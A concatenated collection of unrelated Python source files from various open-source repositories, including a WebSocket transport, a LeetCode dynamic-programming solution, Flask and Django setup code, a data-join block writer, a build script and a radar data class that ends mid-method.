from .web_socket_message_type import WebSocketMessageType
from .web_socket_close_status import WebSocketCloseStatus
from .web_socket_state import WebSocketState
class WebSocketTransport(TransportReceiverBase, TransportSenderBase):
def __init__(self, web_socket: WebSocket):
self._socket = web_socket
@property
def is_connected(self):
# TODO: mock logic
return self._socket.status == WebSocketState.OPEN
async def close(self):
# TODO: mock logic
if self._socket.status == WebSocketState.OPEN:
try:
await self._socket.close(
WebSocketCloseStatus.NORMAL_CLOSURE,
"Closed by the WebSocketTransport",
)
except Exception:
# pylint: disable=pointless-string-statement
"""
Any exception thrown here will be caused by the socket already being closed,
which is the state we want to put it in by calling this method, which
means we don't care if it was already closed and threw an exception
when we tried to close it again.
"""
traceback.print_exc()
# TODO: might need to remove offset and count if no segmentation possible
# TODO: considering to create a BFTransportBuffer class to abstract the logic of binary buffers adapting to
# current interfaces
async def receive(
self, buffer: List[int], offset: int = 0, count: int = None
) -> int:
try:
if self._socket:
result = await self._socket.receive()
buffer_index = offset
result_length = count if count is not None else len(result.data)
for result_index in range(result_length):
buffer[buffer_index] = result.data[result_index]
buffer_index += 1
if result.message_type == WebSocketMessageType.CLOSE:
await self._socket.close(
WebSocketCloseStatus.NORMAL_CLOSURE, "Socket closed"
)
# Depending on ws implementation library next line might not be necessary
if self._socket.status == WebSocketState.CLOSED:
self._socket.dispose()
return result_length
except Exception as error:
# Exceptions of the three types below will also have set the socket's state to closed, which fires an
# event consumers of this class are subscribed to and have handling around. Any other exception needs to
# be thrown to cause a non-transport-connectivity failure.
raise error
# TODO: might need to remove offset and count if no segmentation possible (or put them in BFTransportBuffer)
async def send(self, buffer: List[int], offset: int = 0, count: int = None) -> int:
try:
if self._socket:
await self._socket.send(
buffer[offset:count] if count is not None else buffer,
WebSocketMessageType.BINARY,
True,
)
return count or len(buffer)
except Exception as error:
# Exceptions of the three types below will also have set the socket's state to closed, which fires an
# event consumers of this class are subscribed to and have handling around. Any other exception needs to
# be thrown to cause a non-transport-connectivity failure.
traceback.print_exc()
raise error
return 0
|
leetcode.com/python/198_House_Robber.py
|
vansh-tiwari/coding-interview-gym
| 713 |
121986
|
<filename>leetcode.com/python/198_House_Robber.py
#
# # Recursive + memo (top-down)
# class Solution(object):
# def rob(self, nums):
# """
# :type nums: List[int]
# :rtype: int
# """
# cache = [-1] * len(nums)
# return self.robHelper(nums, len(nums) - 1, cache)
#
# def robHelper(self, nums, currentHouse, cache):
# if currentHouse < 0:
# return 0
# if cache[currentHouse] >= 0:
# return cache[currentHouse]
# robbedMoney = max(self.robHelper(nums, currentHouse - 2, cache) + nums[currentHouse],
# self.robHelper(nums, currentHouse - 1, cache))
# cache[currentHouse] = robbedMoney
# return robbedMoney
# Iterative + 2 variables (bottom-up)
class Solution(object):
def rob(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if len(nums) <= 0:
return 0
previousRobbedMoney, currentRobbedMoney = 0, nums[0]
for i in range(1, len(nums)):
currentRobbedMoneyHolder = currentRobbedMoney
currentRobbedMoney = max(nums[i] + previousRobbedMoney, currentRobbedMoney)
previousRobbedMoney = currentRobbedMoneyHolder
return currentRobbedMoney
sol = Solution()
nums = [1,2,3,1]
out = sol.rob(nums)
print("Res: ", out)
|
maro/cli/grass/lib/services/node_api_server/root.py
|
yangboz/maro
| 598 |
121988
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
""" A Flask server for MARO Node API Server.
Hosted by gunicorn at systemd.
"""
from flask import Flask
from .blueprints.containers import blueprint as container_blueprint
from .blueprints.status import blueprint as status_blueprint
app = Flask(__name__)
app.url_map.strict_slashes = False
# Blueprints related
app.register_blueprint(blueprint=container_blueprint)
app.register_blueprint(blueprint=status_blueprint)
|
Lib/test/test_compiler/testcorpus/02_expr_rel.py
|
diogommartins/cinder
| 1,886 |
121990
|
<reponame>diogommartins/cinder<gh_stars>1000+
a == b
a != b
a < b
a <= b
a > b
a >= b
a is b
a is not b
a in b
a not in b
|
lldb/test/API/dotest.py
|
medismailben/llvm-project
| 2,338 |
122025
|
<reponame>medismailben/llvm-project
#!/usr/bin/env python
if __name__ == "__main__":
import use_lldb_suite
import lldbsuite.test
lldbsuite.test.run_suite()
|
symposion/reviews/migrations/0002_auto_20150812_0920.py
|
azkarmoulana/pycon
| 154 |
122050
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('reviews', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='notificationtemplate',
name='from_address',
field=models.EmailField(max_length=254),
),
migrations.AlterField(
model_name='resultnotification',
name='from_address',
field=models.EmailField(max_length=254),
),
migrations.AlterField(
model_name='resultnotification',
name='to_address',
field=models.EmailField(max_length=254),
),
]
|
src/DataJoin/data_join/data_block_maker.py
|
huangwei19/9nfl
| 103 |
122081
|
# Copyright 2020 The 9nFL Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import logging
import os
import uuid
import tensorflow.compat.v1 as tf
from google.protobuf import text_format
from tensorflow.compat.v1 import gfile
from DataJoin.common import data_join_service_pb2 as data_join_pb
from DataJoin.utils.process_manager import tf_record_iterator_factory, data_block_meta_file_name_wrap, \
block_id_wrap, data_block_file_name_wrap, partition_id_wrap
from DataJoin.utils.base import get_host_ip
import requests
from DataJoin.config import HEADERS, HTTP_SERVICE_PORT, removed_items_nums_from_buffer
host_ip = get_host_ip()
mode = os.environ.get("MODE", None)
def save_data_block_info(meta_path, block_path):
action = getattr(requests, 'POST'.lower(), None)
data = {'dfs_data_block_meta': meta_path, 'dfs_data_block': block_path}
url = "http://{0}:{1}/v1/parse/data/block/meta".format(str(host_ip), HTTP_SERVICE_PORT)
response = action(url=url, json=data, headers=HEADERS)
res = response.json()
logging.info('request result is :%s' % res)
class DataBlockMaker(object):
tmp_file_path_counter = 0
def __init__(self, data_block_dir_name, data_source_name, partition_id,
data_block_index, example_num_threshold=None):
self._data_source_name = data_source_name
self._data_block_manager = None
self._saved_example_num = 0
self._partition_id = partition_id
self._data_block_meta = data_join_pb.DataBlockMeta()
self._data_block_meta.partition_id = partition_id
self._data_block_meta.data_block_index = data_block_index
self._data_block_meta.follower_restart_index = 0
self._example_num_threshold = example_num_threshold
self._data_block_dir_name = data_block_dir_name
self._tmp_file_path = self._make_tmp_file_path()
self._tf_record_writer = tf.io.TFRecordWriter(self._tmp_file_path)
def build_data_block_manager(self, data_block_manager):
self._data_block_manager = data_block_manager
def save(self, data_record, example_id, event_time):
self._tf_record_writer.write(data_record)
self._data_block_meta.example_ids.append(example_id)
if self._saved_example_num == 0:
self._data_block_meta.start_time = event_time
self._data_block_meta.end_time = event_time
else:
if event_time < self._data_block_meta.start_time:
self._data_block_meta.start_time = event_time
if event_time > self._data_block_meta.end_time:
self._data_block_meta.end_time = event_time
self._saved_example_num += 1
def init_maker_by_input_meta(self, data_block_meta):
self._partition_id = data_block_meta.partition_id
self._example_num_threshold = None
self._data_block_meta = data_block_meta
def set_restart_data_join_index(self, restart_data_join_index):
self._data_block_meta.follower_restart_index = restart_data_join_index
def is_data_block_exceed_threshold(self):
if (self._example_num_threshold is not None and
len(self._data_block_meta.example_ids) >=
self._example_num_threshold):
return True
return False
def save_data_record(self, record):
self._tf_record_writer.write(record)
self._saved_example_num += 1
def _make_tmp_file_path(self):
tmp_file_name = str(uuid.uuid1()) + '-{}.tmp'.format(self.tmp_file_path_counter)
self.tmp_file_path_counter += 1
return os.path.join(self._obtain_data_block_dir(), tmp_file_name)
def _make_data_block_meta(self):
meta_file_path_tmp = self._make_tmp_file_path()
with tf.io.TFRecordWriter(meta_file_path_tmp) as meta_writer:
meta_writer.write(text_format.MessageToString(self._data_block_meta).encode())
if self._data_block_manager is not None:
meta_file_path = self._data_block_manager.update_data_block_meta(
meta_file_path_tmp, self._data_block_meta
)
else:
meta_file_name = data_block_meta_file_name_wrap(self._data_source_name,
self._partition_id,
self._data_block_meta.data_block_index)
meta_file_path = os.path.join(self._obtain_data_block_dir(), meta_file_name)
gfile.Rename(meta_file_path_tmp, meta_file_path)
return meta_file_path
def data_block_finalizer(self):
assert self._saved_example_num == len(self._data_block_meta.example_ids)
self._tf_record_writer.close()
if len(self._data_block_meta.example_ids) > 0:
self._data_block_meta.block_id = block_id_wrap(self._data_source_name,
self._data_block_meta)
data_block_path = os.path.join(
self._obtain_data_block_dir(),
data_block_file_name_wrap(
self._data_source_name,
self._data_block_meta
)
)
gfile.Rename(self._tmp_file_path, data_block_path, True)
meta_path = self._make_data_block_meta()
if mode == "distribute":
save_data_block_info(meta_path, data_block_path)
return self._data_block_meta
gfile.Remove(self._tmp_file_path)
return None
def __del__(self):
if self._tf_record_writer is not None:
del self._tf_record_writer
def _obtain_data_block_dir(self):
return os.path.join(
self._data_block_dir_name, partition_id_wrap(self._partition_id)
)
|
rkqc/make.py
|
clairechingching/ScaffCC
| 158 |
122089
|
<reponame>clairechingching/ScaffCC<filename>rkqc/make.py
#!/usr/bin/env python
import subprocess, sys
tee="tee -a" #append
ROOT_DIR=sys.path[0]
script_args = sys.argv
script_name = script_args[0]
def failure():
print ("couldn't parse arguments. Try "+ script_name +" -h")
sys.exit(1);
if len(sys.argv) == 1:
failure()
script_args.pop(0)
script = script_args.pop(0);
validScripts = ["bootstrap", "build", "clean"]
validScriptsDesc =[
"initializes the revkit directory and libraries",
"builds the algorithms",
"cleans the revkit directory"]
if script in ("-h", "--help"):
print ("valid scripts are: " + ', '.join(validScripts))
for x in range (0, len(validScripts)):
print ("- " + validScripts[x] + ": " + validScriptsDesc[x])
print ("Take a look at doc/README for further information.")
sys.exit(2)
elif script in (validScripts):
SCRIPTS_DIR = ROOT_DIR+"/scripts/"
LOG_DIR=ROOT_DIR + "/log"
LOGFILE_SUFFIX=".log"
LOGFILE=LOG_DIR + "/" + script + LOGFILE_SUFFIX
ERRFILE=LOG_DIR + "/" + script + "_error" + LOGFILE_SUFFIX
init = subprocess.Popen([SCRIPTS_DIR + "init" + " " + LOGFILE + " " + ERRFILE], shell=True )
if init.wait() != 0:
print ("init error")
sys.exit(1);
proc = subprocess.Popen([SCRIPTS_DIR + script + " " +( ' '.join(script_args))],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True
)
out = subprocess.Popen([tee + " " + LOGFILE],
stdin=proc.stdout,
shell=True
)
err = subprocess.Popen([tee + " " + ERRFILE],
stdin=proc.stderr,
shell=True
)
exit(proc.wait()) #exit with the return code of the script
else:
failure()
|
tests/data/10.json.py
|
lemon24/reader
| 205 |
122145
|
<filename>tests/data/10.json.py
import datetime
from reader import Content
from reader import Enclosure
from reader._types import EntryData
from reader._types import FeedData
feed = FeedData(
url='{}10.json'.format(url_base),
version='json10',
)
entries = []
|
pycwr/core/PyartRadar.py
|
aliny2003/pycwr
| 144 |
122183
|
"""
## pyart radar object
pyart.core.radar
================
A general central radial scanning (or dwelling) instrument class.
.. autosummary::
:toctree: generated/
_rays_per_sweep_data_factory
_gate_data_factory
_gate_lon_lat_data_factory
_gate_altitude_data_factory
.. autosummary::
:toctree: generated/
:template: dev_template.rst
Radar
"""
# the code for Radar Object in this file were adapted from pyart by <NAME>. & <NAME>.
# https://github.com/ARM-DOE/pyart
from __future__ import print_function
import numpy as np
import sys
from ..configure.pyart_config import get_metadata
from ..configure.pyart_lazydict import LazyLoadDict
from .transforms import antenna_vectors_to_cartesian, cartesian_to_geographic
class Radar(object):
"""
A class for storing antenna coordinate radar data.
The structure of the Radar class is based on the CF/Radial Data file
format. Global attributes and variables (section 4.1 and 4.3) are
represented as a dictionary in the metadata attribute. Other required and
optional variables are represented as dictionaries in a attribute with the
same name as the variable in the CF/Radial standard. When a optional
attribute not present the attribute has a value of None. The data for a
given variable is stored in the dictionary under the 'data' key. Moment
field data is stored as a dictionary of dictionaries in the fields
attribute. Sub-convention variables are stored as a dictionary of
dictionaries under the meta_group attribute.
Refer to the attribute section for information on the parameters.
Attributes
----------
time : dict
Time at the center of each ray.
range : dict
Range to the center of each gate (bin).
fields : dict of dicts
Moment fields.
metadata : dict
Metadata describing the instrument and data.
scan_type : str
Type of scan, one of 'ppi', 'rhi', 'sector' or 'other'. If the scan
volume contains multiple sweep modes this should be 'other'.
latitude : dict
Latitude of the instrument.
longitude : dict
Longitude of the instrument.
altitude : dict
Altitude of the instrument, above sea level.
altitude_agl : dict or None
Altitude of the instrument above ground level. If not provided this
attribute is set to None, indicating this parameter not available.
sweep_number : dict
The number of the sweep in the volume scan, 0-based.
sweep_mode : dict
Sweep mode for each mode in the volume scan.
fixed_angle : dict
Target angle for thr sweep. Azimuth angle in RHI modes, elevation
angle in all other modes.
sweep_start_ray_index : dict
Index of the first ray in each sweep relative to the start of the
volume, 0-based.
sweep_end_ray_index : dict
Index of the last ray in each sweep relative to the start of the
volume, 0-based.
rays_per_sweep : LazyLoadDict
Number of rays in each sweep. The data key of this attribute is
create upon first access from the data in the sweep_start_ray_index and
sweep_end_ray_index attributes. If the sweep locations needs to be
modified, do this prior to accessing this attribute or use
:py:func:`init_rays_per_sweep` to reset the attribute.
target_scan_rate : dict or None
Intended scan rate for each sweep. If not provided this attribute is
set to None, indicating this parameter is not available.
rays_are_indexed : dict or None
Indication of whether ray angles are indexed to a regular grid in
each sweep. If not provided this attribute is set to None, indicating
ray angle spacing is not determined.
ray_angle_res : dict or None
If rays_are_indexed is not None, this provides the angular resolution
of the grid. If not provided or available this attribute is set to
None.
azimuth : dict
Azimuth of antenna, relative to true North. Azimuth angles are
recommended to be expressed in the range of [0, 360], but other
representations are not forbidden.
elevation : dict
Elevation of antenna, relative to the horizontal plane. Elevation
angles are recommended to be expressed in the range of [-180, 180],
but other representations are not forbidden.
gate_x, gate_y, gate_z : LazyLoadDict
Location of each gate in a Cartesian coordinate system assuming a
standard atmosphere with a 4/3 Earth's radius model. The data keys of
these attributes are create upon first access from the data in the
range, azimuth and elevation attributes. If these attributes are
changed use :py:func:`init_gate_x_y_z` to reset.
gate_longitude, gate_latitude : LazyLoadDict
Geographic location of each gate. The projection parameter(s) defined
in the `projection` attribute are used to perform an inverse map
projection from the Cartesian gate locations relative to the radar
location to longitudes and latitudes. If these attributes are changed
use :py:func:`init_gate_longitude_latitude` to reset the attributes.
projection : dic or str
Projection parameters defining the map projection used to transform
from Cartesian to geographic coordinates. The default dictionary sets
the 'proj' key to 'pyart_aeqd' indicating that the native Py-ART
azimuthal equidistant projection is used. This can be modified to
specify a valid pyproj.Proj projparams dictionary or string.
The special key '_include_lon_0_lat_0' is removed when interpreting
this dictionary. If this key is present and set to True, which is
required when proj='pyart_aeqd', then the radar longitude and
latitude will be added to the dictionary as 'lon_0' and 'lat_0'.
gate_altitude : LazyLoadDict
The altitude of each radar gate as calculated from the altitude of the
radar and the Cartesian z location of each gate. If this attribute
is changed use :py:func:`init_gate_altitude` to reset the attribute.
scan_rate : dict or None
Actual antenna scan rate. If not provided this attribute is set to
None, indicating this parameter is not available.
antenna_transition : dict or None
Flag indicating if the antenna is in transition, 1 = yes, 0 = no.
If not provided this attribute is set to None, indicating this
parameter is not available.
rotation : dict or None
The rotation angle of the antenna. The angle about the aircraft
longitudinal axis for a vertically scanning radar.
tilt : dict or None
The tilt angle with respect to the plane orthogonal (Z-axis) to
aircraft longitudinal axis.
roll : dict or None
The roll angle of platform, for aircraft right wing down is positive.
drift : dict or None
Drift angle of antenna, the angle between heading and track.
heading : dict or None
Heading (compass) angle, clockwise from north.
pitch : dict or None
Pitch angle of antenna, for aircraft nose up is positive.
georefs_applied : dict or None
Indicates whether the variables have had georeference calculation
applied. Leading to Earth-centric azimuth and elevation angles.
instrument_parameters : dict of dicts or None
Instrument parameters, if not provided this attribute is set to None,
indicating these parameters are not avaiable. This dictionary also
includes variables in the radar_parameters CF/Radial subconvention.
radar_calibration : dict of dicts or None
Instrument calibration parameters. If not provided this attribute is
set to None, indicating these parameters are not available
ngates : int
Number of gates (bins) in a ray.
nrays : int
Number of rays in the volume.
nsweeps : int
Number of sweep in the volume.
"""
def __init__(self, time, _range, fields, metadata, scan_type,
latitude, longitude, altitude,
sweep_number, sweep_mode, fixed_angle, sweep_start_ray_index,
sweep_end_ray_index,
azimuth, elevation,
altitude_agl=None,
target_scan_rate=None, rays_are_indexed=None,
ray_angle_res=None,
scan_rate=None, antenna_transition=None,
instrument_parameters=None,
radar_calibration=None,
rotation=None, tilt=None, roll=None, drift=None, heading=None,
pitch=None, georefs_applied=None,
):
if 'calendar' not in time:
time['calendar'] = 'gregorian'
self.time = time
self.range = _range
self.fields = fields
self.metadata = metadata
self.scan_type = scan_type
self.latitude = latitude
self.longitude = longitude
self.altitude = altitude
self.altitude_agl = altitude_agl # optional
self.sweep_number = sweep_number
self.sweep_mode = sweep_mode
self.fixed_angle = fixed_angle
self.sweep_start_ray_index = sweep_start_ray_index
self.sweep_end_ray_index = sweep_end_ray_index
self.target_scan_rate = target_scan_rate # optional
self.rays_are_indexed = rays_are_indexed # optional
self.ray_angle_res = ray_angle_res # optional
self.azimuth = azimuth
self.elevation = elevation
self.scan_rate = scan_rate # optional
self.antenna_transition = antenna_transition # optional
self.rotation = rotation # optional
self.tilt = tilt # optional
self.roll = roll # optional
self.drift = drift # optional
self.heading = heading # optional
self.pitch = pitch # optional
self.georefs_applied = georefs_applied # optional
self.instrument_parameters = instrument_parameters # optional
self.radar_calibration = radar_calibration # optional
self.ngates = len(_range['data'])
self.nrays = len(time['data'])
self.nsweeps = len(sweep_number['data'])
self.projection = {'proj': 'pyart_aeqd', '_include_lon_0_lat_0': True}
# initalize attributes with lazy load dictionaries
self.init_rays_per_sweep()
self.init_gate_x_y_z()
self.init_gate_longitude_latitude()
self.init_gate_altitude()
def __getstate__(self):
""" Return object's state which can be pickled. """
state = self.__dict__.copy() # copy the objects state
# Remove unpicklable entries (those which are lazily loaded
del state['rays_per_sweep']
del state['gate_x']
del state['gate_y']
del state['gate_z']
del state['gate_longitude']
del state['gate_latitude']
del state['gate_altitude']
return state
def __setstate__(self, state):
""" Restore unpicklable entries from pickled object. """
self.__dict__.update(state)
self.init_rays_per_sweep()
self.init_gate_x_y_z()
self.init_gate_longitude_latitude()
self.init_gate_altitude()
# Attribute init/reset method
def init_rays_per_sweep(self):
""" Initialize or reset the rays_per_sweep attribute. """
lazydic = LazyLoadDict(get_metadata('rays_per_sweep'))
lazydic.set_lazy('data', _rays_per_sweep_data_factory(self))
self.rays_per_sweep = lazydic
def init_gate_x_y_z(self):
""" Initialize or reset the gate_{x, y, z} attributes. """
gate_x = LazyLoadDict(get_metadata('gate_x'))
gate_x.set_lazy('data', _gate_data_factory(self, 0))
self.gate_x = gate_x
gate_y = LazyLoadDict(get_metadata('gate_y'))
gate_y.set_lazy('data', _gate_data_factory(self, 1))
self.gate_y = gate_y
gate_z = LazyLoadDict(get_metadata('gate_z'))
gate_z.set_lazy('data', _gate_data_factory(self, 2))
self.gate_z = gate_z
def init_gate_longitude_latitude(self):
"""
Initialize or reset the gate_longitude and gate_latitude attributes.
"""
gate_longitude = LazyLoadDict(get_metadata('gate_longitude'))
gate_longitude.set_lazy('data', _gate_lon_lat_data_factory(self, 0))
self.gate_longitude = gate_longitude
gate_latitude = LazyLoadDict(get_metadata('gate_latitude'))
gate_latitude.set_lazy('data', _gate_lon_lat_data_factory(self, 1))
self.gate_latitude = gate_latitude
def init_gate_altitude(self):
""" Initialize the gate_altitude attribute. """
gate_altitude = LazyLoadDict(get_metadata('gate_altitude'))
gate_altitude.set_lazy('data', _gate_altitude_data_factory(self))
self.gate_altitude = gate_altitude
# private functions for checking limits, etc.
def _check_sweep_in_range(self, sweep):
""" Check that a sweep number is in range. """
if sweep < 0 or sweep >= self.nsweeps:
raise IndexError('Sweep out of range: ', sweep)
return
# public check functions
def check_field_exists(self, field_name):
"""
Check that a field exists in the fields dictionary.
If the field does not exist raise a KeyError.
Parameters
----------
field_name : str
Name of field to check.
"""
if field_name not in self.fields:
raise KeyError('Field not available: ' + field_name)
return
# Iterators
def iter_start(self):
""" Return an iterator over the sweep start indices. """
return (s for s in self.sweep_start_ray_index['data'])
def iter_end(self):
""" Return an iterator over the sweep end indices. """
return (s for s in self.sweep_end_ray_index['data'])
def iter_start_end(self):
""" Return an iterator over the sweep start and end indices. """
return ((s, e) for s, e in zip(self.iter_start(), self.iter_end()))
def iter_slice(self):
""" Return an iterator which returns sweep slice objects. """
return (slice(s, e+1) for s, e in self.iter_start_end())
def iter_field(self, field_name):
""" Return an iterator which returns sweep field data. """
self.check_field_exists(field_name)
return (self.fields[field_name]['data'][s] for s in self.iter_slice())
def iter_azimuth(self):
""" Return an iterator which returns sweep azimuth data. """
return (self.azimuth['data'][s] for s in self.iter_slice())
def iter_elevation(self):
""" Return an iterator which returns sweep elevation data. """
return (self.elevation['data'][s] for s in self.iter_slice())
# get methods
def get_start(self, sweep):
""" Return the starting ray index for a given sweep. """
self._check_sweep_in_range(sweep)
return self.sweep_start_ray_index['data'][sweep]
def get_end(self, sweep):
""" Return the ending ray for a given sweep. """
self._check_sweep_in_range(sweep)
return self.sweep_end_ray_index['data'][sweep]
def get_start_end(self, sweep):
""" Return the starting and ending ray for a given sweep. """
return self.get_start(sweep), self.get_end(sweep)
def get_slice(self, sweep):
""" Return a slice for selecting rays for a given sweep. """
start, end = self.get_start_end(sweep)
return slice(start, end+1)
def get_field(self, sweep, field_name, copy=False):
"""
Return the field data for a given sweep.
When used with :py:func:`get_gate_x_y_z` this method can be used to
obtain the data needed for plotting a radar field with the correct
spatial context.
Parameters
----------
sweep : int
Sweep number to retrieve data for, 0 based.
field_name : str
Name of the field from which data should be retrieved.
copy : bool, optional
True to return a copy of the data. False, the default, returns
a view of the data (when possible), changing this data will
change the data in the underlying Radar object.
Returns
-------
data : array
Array containing data for the requested sweep and field.
"""
self.check_field_exists(field_name)
s = self.get_slice(sweep)
data = self.fields[field_name]['data'][s]
if copy:
return data.copy()
else:
return data
def get_azimuth(self, sweep, copy=False):
"""
Return an array of azimuth angles for a given sweep.
Parameters
----------
sweep : int
Sweep number to retrieve data for, 0 based.
copy : bool, optional
True to return a copy of the azimuths. False, the default, returns
a view of the azimuths (when possible), changing this data will
change the data in the underlying Radar object.
Returns
-------
azimuths : array
Array containing the azimuth angles for a given sweep.
"""
s = self.get_slice(sweep)
azimuths = self.azimuth['data'][s]
if copy:
return azimuths.copy()
else:
return azimuths
def get_elevation(self, sweep, copy=False):
"""
Return an array of elevation angles for a given sweep.
Parameters
----------
sweep : int
Sweep number to retrieve data for, 0 based.
copy : bool, optional
True to return a copy of the elevations. False, the default,
returns a view of the elevations (when possible), changing this
data will change the data in the underlying Radar object.
Returns
-------
azimuths : array
Array containing the elevation angles for a given sweep.
"""
s = self.get_slice(sweep)
elevation = self.elevation['data'][s]
if copy:
return elevation.copy()
else:
return elevation
def get_gate_x_y_z(self, sweep, edges=False, filter_transitions=False):
"""
Return the x, y and z gate locations in meters for a given sweep.
With the default parameter this method returns the same data as
contained in the gate_x, gate_y and gate_z attributes but this method
performs the gate location calculations only for the specified sweep
and therefore is more efficient than accessing this data through these
attribute.
When used with :py:func:`get_field` this method can be used to obtain
the data needed for plotting a radar field with the correct spatial
context.
Parameters
----------
sweep : int
Sweep number to retrieve gate locations from, 0 based.
edges : bool, optional
True to return the locations of the gate edges calculated by
interpolating between the range, azimuths and elevations.
False (the default) will return the locations of the gate centers
with no interpolation.
filter_transitions : bool, optional
True to remove rays where the antenna was in transition between
sweeps. False will include these rays. No rays will be removed
if the antenna_transition attribute is not available (set to None).
Returns
-------
x, y, z : 2D array
Array containing the x, y and z, distances from the radar in
meters for the center (or edges) for all gates in the sweep.
"""
azimuths = self.get_azimuth(sweep)
elevations = self.get_elevation(sweep)
if filter_transitions and self.antenna_transition is not None:
sweep_slice = self.get_slice(sweep)
valid = self.antenna_transition['data'][sweep_slice] == 0
azimuths = azimuths[valid]
elevations = elevations[valid]
return antenna_vectors_to_cartesian(
self.range['data'], azimuths, elevations, edges=edges)
def get_gate_lat_lon_alt(self, sweep, reset_gate_coords=False,
filter_transitions=False):
"""
Return the longitude, latitude and altitude gate locations.
Longitude and latitude are in degrees and altitude in meters.
With the default parameter this method returns the same data as
contained in the gate_latitude, gate_longitude and gate_altitude
attributes but this method performs the gate location calculations
only for the specified sweep and therefore is more efficient than
accessing this data through these attribute. If coordinates have
at all, please use the reset_gate_coords parameter.
Parameters
----------
sweep : int
Sweep number to retrieve gate locations from, 0 based.
reset_gate_coords : bool, optional
Optional to reset the gate latitude, gate longitude and gate
altitude attributes before using them in this function. This
is useful when the geographic coordinates have changed and gate
latitude, gate longitude and gate altitude need to be reset.
filter_transitions : bool, optional
True to remove rays where the antenna was in transition between
sweeps. False will include these rays. No rays will be removed
if the antenna_transition attribute is not available (set to None).
Returns
-------
lat, lon, alt : 2D array
Array containing the latitude, longitude and altitude,
for all gates in the sweep.
"""
s = self.get_slice(sweep)
if reset_gate_coords:
gate_latitude = LazyLoadDict(get_metadata('gate_latitude'))
gate_latitude.set_lazy('data', _gate_lon_lat_data_factory(self, 1))
self.gate_latitude = gate_latitude
gate_longitude = LazyLoadDict(get_metadata('gate_longitude'))
gate_longitude.set_lazy('data', _gate_lon_lat_data_factory(self, 0))
self.gate_longitude = gate_longitude
gate_altitude = LazyLoadDict(get_metadata('gate_altitude'))
gate_altitude.set_lazy('data', _gate_altitude_data_factory(self))
self.gate_altitude = gate_altitude
lat = self.gate_latitude['data'][s]
lon = self.gate_longitude['data'][s]
alt = self.gate_altitude['data'][s]
if filter_transitions and self.antenna_transition is not None:
valid = self.antenna_transition['data'][s] == 0
lat = lat[valid]
lon = lon[valid]
alt = alt[valid]
return lat, lon, alt
def get_nyquist_vel(self, sweep, check_uniform=True):
"""
Return the Nyquist velocity in meters per second for a given sweep.
Raises a LookupError if the Nyquist velocity is not available, an
Exception is raised if the velocities are not uniform in the sweep
unless check_uniform is set to False.
Parameters
----------
sweep : int
Sweep number to retrieve data for, 0 based.
check_uniform : bool
True to check to perform a check on the Nyquist velocities that
they are uniform in the sweep, False will skip this check and
return the velocity of the first ray in the sweep.
Returns
-------
nyquist_velocity : float
Array containing the Nyquist velocity in m/s for a given sweep.
"""
s = self.get_slice(sweep)
try:
nyq_vel = self.instrument_parameters['nyquist_velocity']['data'][s]
except:
raise LookupError('Nyquist velocity unavailable')
if check_uniform:
if np.any(nyq_vel != nyq_vel[0]):
raise Exception('Nyquist velocities are not uniform in sweep')
return float(nyq_vel[0])
# Methods
def info(self, level='standard', out=sys.stdout):
"""
Print information on radar.
Parameters
----------
level : {'compact', 'standard', 'full', 'c', 's', 'f'}, optional
Level of information on radar object to print, compact is
minimal information, standard more and full everything.
out : file-like, optional
Stream to direct output to, default is to print information
to standard out (the screen).
"""
if level == 'c':
level = 'compact'
elif level == 's':
level = 'standard'
elif level == 'f':
level = 'full'
if level not in ['standard', 'compact', 'full']:
raise ValueError('invalid level parameter')
self._dic_info('altitude', level, out)
self._dic_info('altitude_agl', level, out)
self._dic_info('antenna_transition', level, out)
self._dic_info('azimuth', level, out)
self._dic_info('elevation', level, out)
print('fields:', file=out)
for field_name, field_dic in self.fields.items():
self._dic_info(field_name, level, out, field_dic, 1)
self._dic_info('fixed_angle', level, out)
if self.instrument_parameters is None:
print('instrument_parameters: None', file=out)
else:
print('instrument_parameters:', file=out)
for name, dic in self.instrument_parameters.items():
self._dic_info(name, level, out, dic, 1)
self._dic_info('latitude', level, out)
self._dic_info('longitude', level, out)
print('nsweeps:', self.nsweeps, file=out)
print('ngates:', self.ngates, file=out)
print('nrays:', self.nrays, file=out)
if self.radar_calibration is None:
print('radar_calibration: None', file=out)
else:
print('radar_calibration:', file=out)
for name, dic in self.radar_calibration.items():
self._dic_info(name, level, out, dic, 1)
self._dic_info('range', level, out)
self._dic_info('scan_rate', level, out)
print('scan_type:', self.scan_type, file=out)
self._dic_info('sweep_end_ray_index', level, out)
self._dic_info('sweep_mode', level, out)
self._dic_info('sweep_number', level, out)
self._dic_info('sweep_start_ray_index', level, out)
self._dic_info('target_scan_rate', level, out)
self._dic_info('time', level, out)
# Airborne radar parameters
if self.rotation is not None:
self._dic_info('rotation', level, out)
if self.tilt is not None:
self._dic_info('tilt', level, out)
if self.roll is not None:
self._dic_info('roll', level, out)
if self.drift is not None:
self._dic_info('drift', level, out)
if self.heading is not None:
self._dic_info('heading', level, out)
if self.pitch is not None:
self._dic_info('pitch', level, out)
if self.georefs_applied is not None:
self._dic_info('georefs_applied', level, out)
# always print out all metadata last
self._dic_info('metadata', 'full', out)
def _dic_info(self, attr, level, out, dic=None, ident_level=0):
""" Print information on a dictionary attribute. """
if dic is None:
dic = getattr(self, attr)
ilvl0 = '\t' * ident_level
ilvl1 = '\t' * (ident_level + 1)
if dic is None:
print(str(attr) + ': None', file=out)
return
# make a string summary of the data key if it exists.
if 'data' not in dic:
d_str = 'Missing'
elif not isinstance(dic['data'], np.ndarray):
d_str = '<not a ndarray>'
else:
data = dic['data']
t = (data.dtype, data.shape)
d_str = '<ndarray of type: %s and shape: %s>' % t
# compact, only data summary
if level == 'compact':
print(ilvl0 + str(attr) + ':', d_str, file=out)
# standard, all keys, only summary for data
elif level == 'standard':
print(ilvl0 + str(attr) + ':', file=out)
print(ilvl1 + 'data:', d_str, file=out)
for key, val in dic.items():
if key == 'data':
continue
print(ilvl1 + key + ':', val, file=out)
# full, all keys, full data
